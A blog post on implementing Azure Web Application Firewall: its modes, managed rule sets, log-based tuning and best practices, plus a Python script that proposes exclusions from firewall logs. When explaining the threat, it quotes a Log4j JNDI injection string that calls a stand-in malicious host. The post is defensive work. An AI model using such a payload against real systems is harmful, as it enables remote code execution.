This week, let’s see how to implement Azure WAF.
Why do you need a WAF?
- One of the most vulnerable resources in your environment is the internet-facing web application.
- It is an easy target for threat actors, as it can be reached by anyone via its public URL.
- All they need is to find a vulnerability and start exploiting it. A recent example is Log4j, where remote code execution was possible through a JNDI lookup such as “${jndi:ldap://malicious.com/file}”.
What is Azure WAF?
- Azure WAF can be deployed with Application Gateway (a regional resource), Front Door (a global resource) and also via Azure CDN. (Note: we will be talking about WAF v2 features in this blog, as it is the latest version and has better security features than v1.)
- Azure WAF uses managed rule sets under the hood. The managed rule sets are derived from the ModSecurity Core Rule Set (CRS).
- To tune the WAF to your requirements, you can use custom rules and exclusions.
- It works in two modes: Detection (logs requests that match a rule but does not block them) and Prevention (logs and blocks requests that match the managed rule set).
How to implement WAF?
- The first thing to do is to understand the application. A few brainstorming questions:
  - What are the backends, and how critical are they?
  - What programming language is used to develop the application?
- Once you have mapped it out, start analyzing the application behaviour using the WAF firewall logs and the application access logs (for this you need diagnostic logs enabled on your AppGW / Front Door).
- You can use the AppGw WAF Triage Workbook and the WAF Monitor Workbook during this activity.
- After this, start designing the WAF policy. You need to decide a couple of things:
  - Is it going to be a global policy, per site, or per URI?
  - What are my exclusions or custom rules going to be? (Note: exclusions are limited to 40 and custom rules to 100.)
- Best practice tips:
  - Use as granular a policy as possible.
  - Enable only the managed rule sets the application requires.
  - Integrate WAF logs with your SIEM for automated incident response.
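The log-analysis and exclusion-design steps above, as an added Python example that is not part of the original post: it ranks which managed rules fire on which URIs in Detection-mode firewall logs, proposes exclusions for review, and refuses to exceed the 40-exclusion limit. It assumes log lines in the shape of the ApplicationGatewayFirewallLog "properties" object (abbreviated), uses constructed sample records, and the "many distinct clients means benign traffic" heuristic is the example's own assumption, not Microsoft guidance.

```python
import json
from collections import defaultdict

# Constructed sample records in the shape of ApplicationGatewayFirewallLog
# "properties" (abbreviated; real diagnostic records carry more fields).
SAMPLE_LOG_LINES = [json.dumps(r) for r in [
    {"ruleId": "942100", "action": "Detected", "clientIp": "203.0.113.10", "requestUri": "/api/search",
     "details": {"data": "Matched Data: ' found within ARGS:q: O'Brien"}},
    {"ruleId": "942100", "action": "Detected", "clientIp": "203.0.113.11", "requestUri": "/api/search",
     "details": {"data": "Matched Data: ' found within ARGS:q: D'Angelo"}},
    {"ruleId": "942100", "action": "Detected", "clientIp": "203.0.113.12", "requestUri": "/api/search",
     "details": {"data": "Matched Data: ' found within ARGS:q: rock 'n' roll"}},
    {"ruleId": "941100", "action": "Detected", "clientIp": "198.51.100.7", "requestUri": "/login",
     "details": {"data": "Matched Data: [redacted] found within ARGS:user: [redacted]"}},
]]

# ModSecurity collection name -> Azure WAF exclusion match variable
MATCH_VAR_TO_EXCLUSION = {"ARGS": "RequestArgNames", "REQUEST_HEADERS": "RequestHeaderNames",
                          "REQUEST_COOKIES": "RequestCookieNames"}

def parse_match_variable(data):
    """Return (collection, selector) from a CRS 'found within COLL:sel: ...' message, else None."""
    parts = data.split("found within ", 1)[1].split(":") if "found within " in data else []
    return (parts[0].strip(), parts[1].strip()) if len(parts) >= 2 else None

def rank_rules(log_lines):
    """Group hits by (ruleId, requestUri): hit count, distinct clients, matched selectors."""
    hits = defaultdict(lambda: {"count": 0, "clients": set(), "selectors": set()})
    for rec in map(json.loads, log_lines):
        entry = hits[(rec["ruleId"], rec["requestUri"])]
        entry["count"] += 1
        entry["clients"].add(rec["clientIp"])
        if mv := parse_match_variable(rec.get("details", {}).get("data", "")):
            entry["selectors"].add(mv)
    return sorted(hits.items(), key=lambda kv: -kv[1]["count"])

def candidate_exclusions(log_lines, min_clients=3, max_exclusions=40):
    """Rules firing on one URI from many distinct clients are usually benign traffic and become
    exclusion proposals; a single client hitting a rule repeatedly is left to the analyst."""
    proposals = []
    for (rule_id, uri), entry in rank_rules(log_lines):
        if len(entry["clients"]) < min_clients:
            continue
        for collection, selector in sorted(entry["selectors"]):
            if collection in MATCH_VAR_TO_EXCLUSION:
                proposals.append({"ruleId": rule_id, "requestUri": uri, "selector": selector,
                                  "matchVariable": MATCH_VAR_TO_EXCLUSION[collection]})
    if len(proposals) > max_exclusions:  # per-policy limit of 40 exclusions cited in the post
        raise ValueError(f"{len(proposals)} proposals exceed the {max_exclusions}-exclusion limit")
    return proposals
```

Run it against an export of your own Detection-mode firewall logs, review each proposal, and only then narrow the exclusion to the URI and match variable it needs before switching the policy to Prevention.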